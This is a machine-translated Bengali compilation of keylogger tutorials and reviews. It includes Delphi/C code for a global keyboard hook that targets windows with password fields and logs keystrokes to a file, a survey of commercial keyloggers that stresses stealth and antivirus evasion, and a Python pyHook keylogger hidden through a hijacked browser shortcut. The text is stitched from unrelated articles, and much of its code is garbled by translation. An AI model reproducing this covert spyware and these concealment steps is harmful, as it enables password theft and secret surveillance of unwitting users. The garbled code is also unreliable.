GetWindowText(hw,st,128);// পড়ুন
বর্তমানে সক্রিয় উইন্ডো।
ll=0;
যখন (stt==st)
{
ll++;
}
}
চক্র থেকে প্রস্থান নির্দেশ করে যে সক্রিয়
উইন্ডোটি পরিবর্তিত হয়েছে, তাই পরবর্তীতে আমরা "স্পাইওয়্যার" আনলোড করি
লাইব্রেরি এবং চক্র শুরু থেকে শুরু হয় - অর্থাৎ
প্রোগ্রাম আবার একটি জন্য অপেক্ষা করে
প্রয়োজনীয় জানালা।
ফ্রি লাইব্রেরি (হিনস্টেজ);
যাইহোক, উপরের পদ্ধতি এছাড়াও আছে
অসুবিধা - প্রতিবার পরীক্ষা করা প্রয়োজন
উইন্ডোজের একটি সম্পূর্ণ তালিকা থেকে আপনার প্রয়োজন?
আমরা এই মুহূর্তে সক্রিয়। এই জন্য
আপনি একটি ভিন্ন অ্যালগরিদম ব্যবহার করতে পারেন - পরীক্ষা করবেন না
উইন্ডো শিরোনাম, এবং এটি যদি তাকান
এডিটবক্স টাইপের উইন্ডো উপাদান। একটি নিয়ম হিসাবে,
পাসওয়ার্ড সেখানে লেখা আছে :) এর জন্য থাকবে
এই উইন্ডোর উপাদানগুলি দেখুন - এবং যদি
তাদের মধ্যে সম্পাদনা আছে - তারপর আমরা DLL লোড করি।
char p2, p3; //অ্যারে
উইন্ডো শিরোনামের জন্য অক্ষর।
আবার, আমরা একটি লুপে সমস্ত উইন্ডো চেক করি:
যখন (p3!="সম্পাদনা") //বাই
আমরা একটি সম্পাদনা বাক্স সহ একটি উইন্ডো খুঁজে পাইনি - একটি লুপ চালান৷
{
hw=GetForegroundWindow();
HWND hwnd_child; // পরিবর্তনশীল
উইন্ডো উপাদান
hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child,p3,128);
যদি (p3!="সম্পাদনা")
// যদি প্রথমটি হয়
উইন্ডো উপাদান পাওয়া গেছে - EditBox নয় - তারপর
আরও খুঁজছেন
{
যখন (hwnd_child!=0)
{
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);
GetClassName(hwnd_child,p3,128);
যদি (p3=="সম্পাদনা")
{
থামা
}
}
}
}
এখন গুপ্তচর DLL নিজেই সম্পর্কে.
এটি ডেলফিতে লিখতে ভাল, কারণ এটি
পাস্কালের পরিণত বংশধরের কাছে এমনটি নেই
বিকৃত "সিপিপিশ" অভ্যাস
তথ্য প্রকার সম্পর্কে nitpicking. তৈরী করতে
লাইব্রেরি নির্বাচন করুন File-New-Direct Link Library - এবং
DLL এর টেমপ্লেট প্রস্তুত। এবং এখানে কোড নিজেই:
লাইব্রেরি কী1;
উইন্ডোজ ব্যবহার করে;
var
KHook: HHOOK; // এর জন্য পরিবর্তনশীল
"ফাঁদ"
ফাংশন KProc(কোড: পূর্ণসংখ্যা; wParam: Word; lParam: LongInt): LongInt; stdcall;
const
KState: integer = 1073741824; //কোড
"চাবি চাপা"
var
Simv: ShortString;
KL: Char এর অ্যারে; //এর জন্য
কীবোর্ড লেআউট পরীক্ষা করা হচ্ছে
FStruct: TOFSTRUCT;
F:টেক্সটফাইল;// পরিবর্তনশীল
লগ রেকর্ড করার জন্য ফাইল।
শুরু
// আগাছা আউট অপ্রয়োজনীয় বেশী
বার্তা
যদি (lParam এবং KState)<>0 তারপর
শুরু
প্রস্থান;
শেষ;
অ্যাসাইনফাইল(F, "keylog.txt");
// খোলার চেষ্টা করছি
ফাইল "keylog.txt":
যদি OpenFile(PChar("keylog.txt"), FStruct, OF_EXIST) = HFILE_ERROR তাহলে
শুরু
পুনরায় লিখুন(F);// যদি ফাইলটি না হয়
তৈরি - আমরা তৈরি করি।
শেষ
অন্যথায় যোগ করুন(এফ);
// যদি থাকে, তাহলে লিখুন
শেষ.
Simv:=chr(0); //শূন্যে রিসেট করুন
কীবোর্ড থেকে পড়া প্রতীকের পরিবর্তনশীল।
// কোড বিশ্লেষণ করুন
কী চাপা
কেস wParam এর
// সংখ্যা
48..57: Simv:=Chr(wParam);
96: Simv:="0";
97: Simv:="1";
...
104: Simv:="8";
105: Simv:="9";
189,109: Simv:="-";
110: Simv:=".";
111: Simv:="/";
শেষ;
GetKeyboardLayoutName(KL); //
লেআউট পরীক্ষা করা হচ্ছে
যদি KL = "00000409" তাহলে // যদি
ল্যাটিন:
শুরু
কেস wParam এর
219: Simv:="[";
221: Simv:="]";
186: Simv:=";";
222: Simv:=""";
188: Simv:=",";
190: Simv:="।";
191: Simv:="/";
65..90: Simv:=Chr(wParam);
শেষ;
শেষ;
শেষ;
যদি KL = "00000419" তাহলে// যদি
রাশিয়ান
শুরু
কেস wParam এর
219: Simv:="X";
221: Simv:="Ъ";
186: Simv:="F";
222: Simv:="E";
188: Simv:="B";
190: Simv:="Yu";
191: Simv:="।";
65: Simv:="F";
...
87: Simv:="C";
88: Simv:="H";
89: Simv:="N";
90: Simv:="I";
শেষ;
// যদি প্রতীক খালি না হয় (যেমন
যদি একটি আলফানিউমেরিক কী চাপানো হয়)
// তারপর এটি একটি ফাইলে লিখুন
যদি Simv<>"" তারপর
লিখুন(F, Simv);
//ফাইল বন্ধ করুন
ক্লোজফাইল(এফ);
// বার্তা পাঠান
সিস্টেমের অন্যান্য ফাঁদ
ফলাফল:=CallNextHookEx(KHook, কোড, wParam, lParam);
শেষ;
শুরু
//ফাঁদ সেট করুন
কীবোর্ড বার্তা আটকাতে।
KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);
এই প্রোগ্রাম এছাড়াও সরলীকৃত করা যেতে পারে
আবেদনের উপর নির্ভর করে - যদি
ধরা যাক আপনাকে শুধুমাত্র একবার গণনা করতে হবে
ডায়লার থেকে পাসওয়ার্ড - তারপর আপনি সেট করতে পারেন
আমাদের এটি প্রয়োজন না হওয়া পর্যন্ত জানালা চেক করা, এবং যখন এটি হয়
সক্রিয় হয়ে উঠবে - লাইব্রেরি লোড করুন
key1.dll, এর জন্য একটি নির্দিষ্ট সময় অপেক্ষা করুন
যা ব্যবহারকারীর কাছে এই অক্ষরগুলি টাইপ করার সময় থাকবে
কীবোর্ড এবং তারপর লাইব্রেরি আনলোড করুন এবং
প্রোগ্রাম শেষ। এটার মতো কিছু :)
hINSTAGE=LoadLibrary("key1.dll");
ঘুম (10000);
//এর জন্য 10 সেকেন্ড অপেক্ষা করুন
ব্যবহারকারী পাসওয়ার্ড টাইপ করার সময়.
// সময় নির্ভর করে বাড়ানো যেতে পারে
ব্যবহারকারীর বাধার স্তরের উপর নির্ভর করে
// এবং কীবোর্ডে তার টাইপিং গতি :)
ফ্রি লাইব্রেরি(hINSTAGE);
PS: উপরের সমস্ত উপাদান দেওয়া হয়েছিল
একচেটিয়াভাবে ডেমো সহ
সাধারণ শিক্ষাগত লক্ষ্য, লেখক সেট করেছেন
আমি প্রদর্শন করার একটি কাজ আছে
"আপগ্রেড" টাইপের প্রোগ্রাম অ্যালগরিদম
keylogger" এবং সব
এই ব্যবহারের জন্য দায়িত্ব
উপাদান আপনার উপর পড়ে (অপ্রতিরোধ্য
বোঝা 🙂) কোডের বাস্তবায়নে রয়েছে
ছোটখাটো ভুল যা আসলে ক্ষতি করে না
অ্যালগরিদম - সেগুলি নিজেই খুঁজে বের করার চেষ্টা করুন))।
PSS: অবশ্যই, একটি keylogger না শুধুমাত্র
এর প্রধান কাজ সম্পাদন করুন -
আসলে লগ বাটন প্রেস লিখুন, কিন্তু
আপনার প্রয়োজন অনুযায়ী চাপা কীগুলির মান পরিবর্তন করুন
স্বাদ - তবে এটি কীভাবে করবেন এবং এটি কীসের জন্য
সহজভাবে অত্যাবশ্যক হতে পারে - ইন
পরের বার :)
কীলগার বা কীলগার কী।
একটি কীলগার হল একটি ছোট সরঞ্জাম বা প্রোগ্রাম যার উদ্দেশ্য হল একটি জিনিস: শিকারের দ্বারা কীবোর্ড থেকে টাইপ করা অক্ষরগুলিকে আটকানো। ব্যবহারকারীর জন্য সবচেয়ে অপ্রীতিকর প্রোগ্রামগুলির মধ্যে একটি, যা হ্যাকাররা একটি সত্যবাদী ব্যবহারকারীর ডিজিটাল পরিচয় জাল করতে ব্যবহার করে।
বিশেষ সরঞ্জাম ব্যবহারের উপর ভিত্তি করে, একটি কী-লগার (যেমন বাম দিকের একটি - কীবোর্ড তারের বিভাগে) খুব কমই ব্যবহৃত হয় এবং ইনস্টলেশন এবং রক্ষণাবেক্ষণে পেশাদার দক্ষতার প্রয়োজন হয়। বিপরীতভাবে, এটি সনাক্ত করা এত কঠিন নয়, এবং তাই আমরা অন্য কোনও সময় এটি সম্পর্কে কথা বলব। এবং এখন আমি আপনাকে সফ্টওয়্যার আকারে ইন্টারসেপ্টর সম্পর্কে বলব যা আপনার সিস্টেমে দীর্ঘ সময়ের জন্য "কাজ" করতে পারে এবং আপনি এটি সম্পর্কে জানতেও পারবেন না। আমরা নিবন্ধের শেষে একটি কম্পিউটারে কী-লগার চলছে কিনা তা নির্ধারণ করার বিষয়ে কথা বলব। চলুন এই বিষয়ে আজ ইন্টারনেটে যা আছে তা জেনে নেওয়া যাক। প্রত্যাশিত হিসাবে, ইন্টারনেটে এই ভালতা অনেক আছে. বিনামূল্যে প্রোগ্রাম আছে, এবং অর্থপ্রদান সংস্করণ আছে.
জন্য একটি keylogger কি?
প্রোগ্রামের সুনির্দিষ্ট বৈশিষ্ট্যগুলি এই ধরনের ইউটিলিটিগুলির ব্যবহার সম্পর্কে কোনও সন্দেহের ছায়া ফেলে না: এটি আপনাকে কীবোর্ডে টাইপ করা অক্ষরগুলি প্রেরণ করে ব্যবহারকারীর উপর গুপ্তচরবৃত্তি করতে দেয়। আরেকটি প্রশ্ন: কার দ্বারা এবং কার বিরুদ্ধে?
- বাবা-মায়েদের ইন্টারনেটে ভ্রমণ করা তাদের সন্তানদের সম্পর্কে যত্ন নেওয়া বেশ বোধগম্য, যাদের অনলাইন ক্রিয়াকলাপগুলি বাবা এবং মাকে বিরক্ত করতে শুরু করে, যারা যাইহোক, সন্তানের সাথে খোলামেলা দ্বন্দ্বে আসতে চায় না, সবকিছু এবং সবাইকে নিষিদ্ধ করে। একাধিকবার, এই ধরনের ইউটিলিটিগুলি কেবল সাহায্য করে, একটি সন্তানের সামাজিক নেটওয়ার্কে এমন একটি বন্ধুর উপস্থিতির সংকেত দেয় যিনি "একটু বড়" এবং তার অসুস্থ কল্পনাগুলি উপলব্ধি করতে চলেছেন।
- এটি নিয়োগকর্তার বেশ একটি বৈধ ইচ্ছা যখন তিনি নিশ্চিত করতে চান যে কর্মচারী কম্পিউটারে তার সময় কার্যকরভাবে ব্যয় করে। এবং, যদি তা না হয়, তাহলে প্রমাণ সহ দাবি উপস্থাপন করুন। একই সময়ে, নিশ্চিত করুন যে কয়েকটি গোপনীয়তা "পাশে না যায়"।
- অবশেষে, টাইপ করা পাসওয়ার্ড, লগইন ইত্যাদি চুরি করার লক্ষ্যে ব্যবহারকারীর কম্পিউটারে অবৈধ সংযোগ।
কীলগার বিনামূল্যে keylogger.
কীবোর্ড থেকে অক্ষর, ক্লিপবোর্ডে থাকা ডেটা এবং ব্রাউজার অ্যাড্রেস বার থেকে নেটওয়ার্ক ঠিকানাগুলিকে আটকাতে পারে। এখানে কয়েকটি অস্পষ্ট ফাংশন রয়েছে, উদাহরণস্বরূপ, একটি লুকানো অপারেটিং মোড (Ctrl+Shift+Alt+U), প্রোগ্রাম শর্টকাটগুলি সরানো এবং ইনস্টল করা এবং আনইনস্টল করা প্রোগ্রামগুলির তালিকা থেকে লুকানো। প্রোগ্রামের অসুবিধা: এর বিনামূল্যের সংস্করণে, সর্বাধিক গুরুত্বপূর্ণ ফাংশন - ব্যবহারকারীর চোখ থেকে লুকিয়ে - সক্ষম করা যাবে না। উইন্ডোজে অটোরান সম্ভব, তবে চলমান প্রোগ্রামটি ট্রে থেকে বিশ্বাসঘাতকতার সাথে জ্বলজ্বল করবে। আপনি এটিকে দৃশ্য থেকে আড়াল করতে পারবেন না - একটি উইন্ডো পপ আপ করে আপনাকে অবহিত করে যে ফাংশনটি অর্থপ্রদত্ত সংস্করণে উপলব্ধ। যেমন অন্য কিছু আছে.
একমাত্র প্রোগ্রাম উইন্ডো যেখানে:
- সিস্টেম শুরু হওয়ার সাথে সাথে প্রোগ্রামটিকে শুরু করার অনুমতি দেয়
- মেনুতে প্রোগ্রামটি লুকান শুরু করুন
- এটি আপনাকে ব্রাউজারে ঠিকানাগুলি এবং (ডানদিকে) চলমান প্রোগ্রামগুলির নামগুলিকে বাধা দেওয়ার অনুমতি দেবে
- ক্ষেত্রটিতে নির্দিষ্ট করা ডাক ঠিকানায় আমরা আপনাকে প্রতিদিন অবহিত করব।
ইনস্টলেশনের সময়, আপনাকে কয়েক মিনিটের জন্য অ্যান্টিভাইরাসের সাথে লড়াই করতে হবে, কারণ সেটআপ বা ইউটিলিটি লঞ্চ উভয়ই এটি থেকে রক্ষা পাবে না।
কীলগার ড্যানুসফট
সহজ এবং বিনামূল্যে. এছাড়াও 4টি ট্যাব সহ একটি উইন্ডো হিসাবে উপস্থাপন করা হয়েছে৷ গোপন শব্দ প্রবেশ করে লুকিয়ে রাখতে পারে। ডিফল্ট হল HIDEKEY, এবং আপনি SHOWKEY কে উপস্থিত হতে বাধ্য করতে পারেন৷
লগ ফাইল সেটিংস ট্যাবে, আপনি আটকানো রেকর্ড সহ নথির আকার নির্দিষ্ট করতে পারেন এবং প্রকৃতপক্ষে, নথিটি নিজেই দেখাতে পারেন৷ স্টার্টআপ সেটিংস ট্যাবে মাত্র 2টি সেটিংস রয়েছে: উইন্ডোজ এবং স্টিলথ মোড দিয়ে লঞ্চ করুন৷
কীলগার
আরেকটি সহজ প্রোগ্রাম। ইনস্টলেশনের পরে, আপনাকে একটি রঙিন উইন্ডো দ্বারা স্বাগত জানানো হবে। কার্যকারিতা দরিদ্র, এটি নিজেকে লুকিয়ে রাখে না। কিন্তু এটা বিনামূল্যে. ইনস্টলেশনের পরপরই, এটি আপনাকে একটি পাসওয়ার্ড সেট করতে বলবে যাতে তথ্য, বাধা দেওয়ার পরে, শুধুমাত্র ইনস্টলারের কাছে উপলব্ধ হয়:
প্রোগ্রাম উইন্ডো:
কীলগার REFOG ফ্রি কীলগার
প্রোগ্রামটির বিনামূল্যের সংস্করণ, যার প্রস্তুতকারক এই জাতীয় প্রোগ্রামগুলিতে বেশ অভিজ্ঞ, টাইপ করা অক্ষর, সাইটগুলি পরিদর্শন করা এবং চালু করা প্রোগ্রামগুলিকে বাধা দিতে সক্ষম। যাইহোক, আমি এখনই আপনাকে সতর্ক করব - বেশ সংখ্যক ব্যবহারকারীর প্রোগ্রাম আনইনস্টল করতে সমস্যা হয়েছে, বিশেষ করে অর্থপ্রদানের সংস্করণ, তাই আপনার নিজের বিপদ এবং ঝুঁকিতে এটি চেষ্টা করুন। এই লিঙ্ক থেকে আপনি প্রোগ্রামের সর্বশেষ সংস্করণ ডাউনলোড করতে পারেন.
কীলগার Revealer Keylogger বিনামূল্যে
নেটওয়ার্কের সবচেয়ে জনপ্রিয় প্রোগ্রামগুলির মধ্যে একটি। অনেক ফাংশন, ব্যবহার করা সহজ। এটি পাসওয়ার্ড সুরক্ষিত, সিস্টেম ট্রেতে ঝুলে থাকে না এবং প্রোগ্রামগুলি ইনস্টল এবং অপসারণের জন্য সেটিংসে দৃশ্যমান হয় না। আপনার এটি সাবধানে ইনস্টল করা উচিত, কারণ আপনার কম্পিউটারে অন্য কিছু প্রোগ্রাম ইনস্টল করতে বলা হয়েছে। স্ক্রিনশটগুলি শুধুমাত্র অর্থ প্রদানের সংস্করণে পাওয়া যাবে। বন্ধ হয়ে গেলে, এটি আপনাকে সতর্ক করবে যে এটি পটভূমিতে কাজ করতে থাকবে (আপনি এটি Ctrl+Alt+F9 ব্যবহার করে ফেরত দিতে পারেন)। প্রোগ্রামটি Russified, তাই আপনি দ্রুত সেটিংস বের করতে পারেন:
কীলগার কিডলগার
বিনামূল্যে, ওপেন সোর্স। এটি ইতিমধ্যে ইউএসবি ডিভাইসগুলির সাথে কীভাবে কাজ করতে হয় তা জানে। একটি মাইক্রোফোন থেকে অডিও রেকর্ড করে এবং স্কাইপের সাথে কাজ করে। লগ ফাইলগুলি স্থানীয়ভাবে এবং দূরবর্তীভাবে একটি বিশেষভাবে তৈরি করা অনলাইন অ্যাকাউন্ট ব্যবহার করে দেখা যেতে পারে। এটি লুকানো মোডে কাজ করে, তবে টাস্ক ম্যানেজার থেকে দেখা যেতে পারে। আপনি এটিকে একটি পাসওয়ার্ড দিয়ে সুরক্ষিত করতে পারেন, তবে আপনাকে এটি একটি শর্টকাট থেকে চালু করতে হবে, যা নীতিগতভাবে কোন সমস্যা নয়, উইন্ডোজ স্টার্টআপে লঞ্চটি নিবন্ধন করে। আপনি লিঙ্ক থেকে এটি ডাউনলোড করতে পারেন এবং সেখানে পছন্দসই অপারেটিং সিস্টেম নির্বাচন করতে পারেন (আমার সংরক্ষণাগারে উইন্ডোজ সংস্করণ রয়েছে):
কীলগার প্রকৃত কীলগার
পূর্ববর্তী প্রোগ্রাম থেকে ভিন্ন, এটি সম্পূর্ণরূপে অদৃশ্য। এটি ম্যানেজারেও দেখা যাবে না; প্রোগ্রাম সহ ফোল্ডারটি লুকানো হবে, শর্টকাটগুলি প্রদর্শিত হবে না। আপনি একটি ঐতিহ্যগত আনইনস্টলার ব্যবহার করে এটি অপসারণ করতে পারবেন না। খুব জটিল একটা জিনিস। এছাড়াও পাসওয়ার্ড সুরক্ষা আছে। অ্যান্টিভাইরাস খুব একটা পছন্দ করে না। আমি আমার আর্কাইভে এটা আছে. কিন্তু প্রোগ্রাম অর্থপ্রদান করা হয়, ইনস্টল এবং বৈশিষ্ট্য চেক আউট.
পড়ুন: 438
হ্যালো, QUAZAR আবার এখানে আছে. আজ আমি আপনাদের দেখাবো কিভাবে পাইথনে একটি সহজ কীলগার তৈরি করা যায়। অবশ্যই, এই কীলগার যেমন দৈত্যদের সাথে প্রতিযোগিতা করতে পারে না, তবে এটি সত্ত্বেও, এটি এর ব্যবহার খুঁজে পেতে পারে।
একটি keylogger কি?
আপনি কী-লগার কী এবং কী-লগারের ধরন সম্পর্কে ““ নিবন্ধে বিস্তারিত পড়তে পারেন। বিষয়ে অতিরিক্ত উপকরণ খুঁজে পেতে, সাইট অনুসন্ধান ব্যবহার করুন, যা উপরের ডান কোণায় অবস্থিত। শুধু "keylogger" বা "keylogger" শব্দটি লিখুন।
পাইথনে সহজ কীলগার
একটি কীলগার তৈরি করতে আমাদের প্রয়োজন:
- অপারেটিং সিস্টেম: উইন্ডোজ বা ম্যাকও (যেকোন লিনাক্সও ব্যবহার করা যেতে পারে, তবে আমি ব্যক্তিগতভাবে চেষ্টা করিনি)
- পাইথন টার্গেট মেশিনে ইনস্টল করা আছে, সেইসাথে বিশেষ লাইব্রেরি।
এই উপাদান কেবল তথ্যের জন্য। এই নিবন্ধে উপস্থাপিত তথ্য শুধুমাত্র তথ্যের উদ্দেশ্যে প্রদান করা হয়. ওয়েবসাইট www.site এর সম্পাদক বা প্রকাশনার লেখক এই নিবন্ধের উপাদান দ্বারা সৃষ্ট কোন ক্ষতির জন্য কোন দায় বহন করেন না।
পাইথনে একটি সাধারণ কীলগার তৈরি করা
প্রথমে আপনাকে পাইথন ডাউনলোড এবং ইনস্টল করতে হবে।
পাইথনে সহজ কীলগার পাইথন ইনস্টল করার পরে, আপনাকে "pyHook" এবং "pywin32" মডিউলগুলি ইনস্টল করতে হবে। এই সাইটে আপনি Windows এবং অন্যান্য OS এর জন্য 32 এবং 64 বিট সংস্করণ পাবেন। আপনার Python এবং Windows (32bit বা 64bit) এর ইনস্টল করা সংস্করণ অনুযায়ী "PYhook" এবং "pyWin32" ডাউনলোড করুন।
পাইথনে কীলগার। পাইহুক মডিউল 
পাইথনে কীলগার। pyWin32 মডিউল একবার ডাউনলোড হয়ে গেলে, স্টার্ট মেনু থেকে IDLE (Python GUI) মেনু ইনস্টল করুন এবং খুলুন।
পাইথনে সহজ কীলগার "ফাইল" মেনুতে যান এবং "নতুন ফাইল" আইটেমটিতে ক্লিক করুন। তারপর keylogger কোড পেস্ট করুন:
#নামঃ কোয়াজার
#ওয়েবসাইট: www.site
পাইহুক, পাইথনকম, সিএস, লগিং আমদানি করুন
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(ইভেন্ট):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
রিটার্ন সত্য
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
এবং Keylogger.pyw ফাইলে কল করে এটি সংরক্ষণ করুন। রুট ডিরেক্টরি সি-তে ফাইলটি সংরক্ষণ করবেন না: যেখানে ফাইলগুলি অনুলিপি এবং মুছে ফেলার জন্য আপনার প্রশাসকের অধিকার প্রয়োজন। আপনার C: ড্রাইভে একটি নতুন ফোল্ডার তৈরি করুন বা অন্য কোনো স্থানে যেখানে ফাইল কপি করতে এবং Keylogger.pyw সংরক্ষণ করার জন্য আপনার প্রশাসকের অধিকারের প্রয়োজন নেই।
আপনি আউটপুট রিপোর্ট ফাইল “file_log = “C:keyloggerlog.txt” হিসাবে যেকোনো অবস্থান নির্বাচন করতে পারেন, তবে আপনার হার্ড ড্রাইভে অবশ্যই কিছু লুকানো অবস্থান বেছে নিতে পারেন। এই উদাহরণে, আমি রিপোর্ট ফাইলটিকে রুট ডিরেক্টরি সি:-তে ডিস্কে সংরক্ষণ করব। সর্বোপরি, আমার লুকানোর কিছু নেই।
পাইথনে একটি কীলগার স্বয়ংক্রিয়ভাবে চালু করা হয়েছে
কীলগার প্রস্তুত। এখন আমাদের নিশ্চিত করতে হবে যে কী-লগার ব্যবহারকারীর কাছ থেকে লুকানো শুরু হয় এবং যখন উইন্ডোজ বুট হয় তখন স্বয়ংক্রিয়ভাবে। এটি বিভিন্ন উপায়ে বাস্তবায়ন করা যেতে পারে। আসুন একটি ব্যাট ফাইল ব্যবহার করে এটি করার চেষ্টা করি কোন প্রোগ্রামের সাথে কীলগারের লঞ্চটিকে লিঙ্ক করে বা এটিকে স্টার্টআপে নিবন্ধন করে।
প্রথমে একটি ব্যাট ফাইল তৈরি করুন। নোটপ্যাডে নিম্নলিখিত কোড কপি করুন এবং পেস্ট করুন:
::নাম: কোয়াজার
::ওয়েবসাইট: www.site
@ইকো বন্ধ
শুরু করুন "" "C:keyloggerkeylogger.pyw"
শুরু করুন "" "C:Program FilesOperalauncher.exe"
প্রথম লাইনে আপনাকে keylogger.pyw ফাইলের পাথ প্রবেশ করতে হবে (আমার ক্ষেত্রে “C:keylogger.pyw”)। দ্বিতীয় লাইনে, আপনাকে অবশ্যই প্রোগ্রামটির পাথ প্রবেশ করতে হবে যা ব্যবহারকারী সাধারণত ব্যবহার করে (আমার ক্ষেত্রে, অপেরা ব্রাউজার)।
সম্পাদনা করার পরে, আপনার কম্পিউটারে কিছু লুকানো অবস্থানে (আমার ক্ষেত্রে "C:keylogger.bat") একটি .bat এক্সটেনশন (আমার ক্ষেত্রে logger.bat) দিয়ে ফাইলটি সংরক্ষণ করুন।
এখন ডেস্কটপে যান এবং একটি ঘন ঘন ব্যবহৃত প্রোগ্রামের জন্য একটি শর্টকাট নির্বাচন করুন (আমার ক্ষেত্রে, এটি অপেরা ব্রাউজার)। প্রসঙ্গ মেনুতে কল করতে মাউসের ডান-ক্লিক করুন এবং শর্টকাট বৈশিষ্ট্যে যান। "অবজেক্ট" ফিল্ডে, কীলগার ব্যাট ফাইল "C:keyloggerlogger.bat" এর পাথ লিখুন।
পরিবর্তন করার পরে, শর্টকাট আইকনও পরিবর্তন হবে। কিন্তু বৈশিষ্ট্য ট্যাবে এটি সহজেই সমাধান করা যেতে পারে (উপরের স্ক্রিনশট দেখুন)।
হ্যালো, খাব্রোভস্কের বাসিন্দারা।
আমি WinAPI ব্যবহার করে C++ এ একটি সফ্টওয়্যার কীবোর্ড লগার লেখার সিদ্ধান্ত নিয়েছি। আমি বলতে পারি না যে আমি এটি লিখার সময় কোনো ধরনের গুপ্তচরবৃত্তির লক্ষ্য অনুসরণ করছিলাম; বরং, আমি WinAPI হুকগুলির সাথে পরিচিত হয়েছি। যেহেতু এটি এতটা খারাপ নয়, এবং সফ্টওয়্যার লগার সম্পর্কে Habré-এ কোন নিবন্ধ নেই, তাই আমি আমার নিজের লেখার সিদ্ধান্ত নিয়েছি।
এটা কিভাবে করা হয়?
কী-প্রেস ধরার জন্য একটি কীবোর্ড হুক ব্যবহার করা হতো।HHOOK WINAPI SetWindowsHookEx(_In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId);
সমস্ত কীবোর্ড কীস্ট্রোক আটকানোর জন্য, idHook প্যারামিটার হিসাবে WH_KEYBOARD বা WH_KEYBOARD_LL নির্দিষ্ট করা সুবিধাজনক। শুধুমাত্র পার্থক্য হল যে WH_KEYBOARD_LL সিস্টেম কী টিপেও বাধা দেয় (যেমন Alt বা যেকোনো কী যখন Alt চেপে থাকে), তাই আমরা এটি নির্বাচন করব।
Lpfn হল একটি ফাংশনের একটি পয়েন্টার যা বাধাপ্রাপ্ত বার্তাগুলিকে প্রক্রিয়া করে (আমাদের ক্ষেত্রে, কীস্ট্রোক)।
hMod হল একটি অ্যাপ্লিকেশন ইনস্ট্যান্স হ্যান্ডেল যাতে একটি প্রসেসিং ফাংশন থাকে।
dwThreadId হল সেই থ্রেডের শনাক্তকারী যার বার্তা আমরা আটকাতে চাই। সমস্ত থ্রেড থেকে বার্তাগুলিকে আটকাতে এই প্যারামিটারটি অবশ্যই 0 এ সেট করতে হবে৷
রিটার্ন মান হল আমাদের হুকের একটি হ্যান্ডেল, যা প্রস্থান করার সময় UnhookWindowsHookEx ফাংশন দিয়ে মুক্ত করতে হবে।
সাহায্যের জন্য MSDN-এর দিকে তাকিয়ে, আমরা একটি ফাংশনের একটি প্রোটোটাইপ দেখতে পাই যা এই হুক থেকে বার্তাগুলি প্রক্রিয়া করে।
LRESULT কলব্যাক LowLevelKeyboardProc(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam);
nCode অবশ্যই HC_ACTION এর সমান হতে হবে, অন্যথায় বার্তাটি অন্য প্রক্রিয়ায় দেওয়া হবে।
wParam নিম্নলিখিত মানগুলির মধ্যে একটি: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, বা WM_SYSKEYUP৷
lParam হল KBDLLHOOKSTRUCT কাঠামোর একটি নির্দেশক, যে ক্ষেত্রগুলিতে আমরা শুধুমাত্র 2টি প্যারামিটারে আগ্রহী: vkCode (ভার্চুয়াল কোড) এবং চাপা কীটির স্ক্যানকোড।
এই ফাংশনটি অবশ্যই CallNextHookEx ফাংশনের মান প্রদান করবে, অন্যথায় পরবর্তী হুক যা ইভেন্টটি প্রক্রিয়া করে ভুল বার্তা পরামিতি পেতে পারে।
প্রতিবার একটি কী টিপলে, আমাদের প্রোগ্রাম এই ইভেন্টটিকে আটকাবে এবং আমাদের LowLevelKeyboardProc পদ্ধতির মাধ্যমে এটি প্রক্রিয়া করবে।
একটি কী-এর ভার্চুয়াল এবং স্ক্যান কোডকে প্রতীকী আকারে পুনরায় অনুবাদ করার জন্য, আমাদের ToAsciiEx ফাংশন প্রয়োজন।
Int WINAPI ToAsciiEx(_In_ UINT uVirtKey, _In_ UINT uScanCode, _In_opt_ const BYTE *lpKeyState, _Out_ LPWORD lpChar, _In_ UINT uFlags, _In_opt_ HKL);
প্রথম 2টি পরামিতি যথাক্রমে কীটির ভার্চুয়াল এবং স্ক্যান কোড।
lpKeyState — কীবোর্ডের অবস্থা, কোন কী চাপা/সক্রিয় আছে তা পরীক্ষা করে।
lpChar হল একটি দ্বৈত শব্দের একটি নির্দেশক যেখানে ফাংশনটি কীটির প্রতীকী উপস্থাপনা লিখবে।
uFlags হল একটি প্যারামিটার যা মেনু কার্যকলাপ নির্দেশ করে।
dwhkl — কীবোর্ড লেআউট শনাক্তকারী।
রিটার্ন মান হল lpChar বাফারে লেখা অক্ষরের সংখ্যা। 1টি অক্ষর লেখা হলে আমরা সেই ক্ষেত্রে আগ্রহী।
মূলত, সহজতম কীবোর্ড লগারের জন্য এই তিনটি প্রধান ফাংশন প্রয়োজন।
